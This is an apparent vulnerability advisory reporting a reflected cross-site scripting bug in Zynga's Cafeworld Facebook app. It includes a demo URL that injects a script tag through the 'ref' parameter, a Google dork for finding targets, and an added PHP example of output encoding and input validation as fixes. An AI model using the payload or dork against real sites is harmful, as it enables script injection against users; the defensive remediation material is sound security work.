Zynga Cafeworld suffers from a cross-site scripting vulnerability.
-------------------------------------------------------------------------------------------------------------------------------------------------
TITLE: Type-0 XSS bug in CAFEWORLD (Facebook apps)
vendor: www.apps.facebook.com/cafeworld/**[]
Author: r007k17-w a.k.a Raghavendra Karthik.D
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: Copyright 2010 Zynga Game Network Inc
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
DEMO: http://apps.facebook.com/cafeworld/view_gift.php?ref="><script>alert("r007k17-w")</script>
SUG: HTML encoding, escaping special characters, input sanitization.
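
The suggested fixes, as an added example that is not part of the original advisory and is not Zynga's code. The page does not show how view_gift.php uses `ref`; the sketch assumes it is reflected into a double-quoted HTML attribute (consistent with the `">` prefix in the demo), and the function names and the allow-list pattern are hypothetical.

```php
<?php
// Added example: hypothetical handler, not the application's real code.
// Assumption: `ref` is reflected into a double-quoted HTML attribute.

// Vulnerable pattern: raw concatenation lets a `"` close the attribute and
// `>` close the tag, so the rest of the value is parsed as markup.
function render_unsafe(string $ref): string {
    return '<input type="hidden" name="ref" value="' . $ref . '">';
}

// Fix 1 (output encoding): encode for the HTML attribute context.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function render_encoded(string $ref): string {
    $safe = htmlspecialchars($ref, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="ref" value="' . $safe . '">';
}

// Fix 2 (input validation): accept only the shape a referral tag should
// have. The allow-list below is an assumption about legitimate values.
function validate_ref($ref): ?string {
    if (!is_string($ref)) {            // rejects array input such as ref[]=x
        return null;
    }
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $ref) === 1 ? $ref : null;
}

// Constructed sample inputs: the value from the DEMO line and a benign tag.
$samples = ['"><script>alert("r007k17-w")</script>', 'gift_feed_01'];
foreach ($samples as $raw) {
    $ref = validate_ref($raw) ?? '';   // rejected input falls back to empty
    echo render_encoded($ref), PHP_EOL;
}

// Encoding alone still neutralises the value if validation is ever skipped,
// while the unencoded version reflects the markup unchanged.
if (strpos(render_encoded($samples[0]), '<script') !== false) {
    throw new RuntimeException('attribute encoding did not neutralise markup');
}
if (strpos(render_unsafe($samples[0]), '<script') === false) {
    throw new RuntimeException('expected raw reflection in the unsafe version');
}
```

Validation and encoding are layered on purpose: validation narrows what is accepted, and encoding at the point of output protects every code path that writes the value into HTML.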
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts and all my friends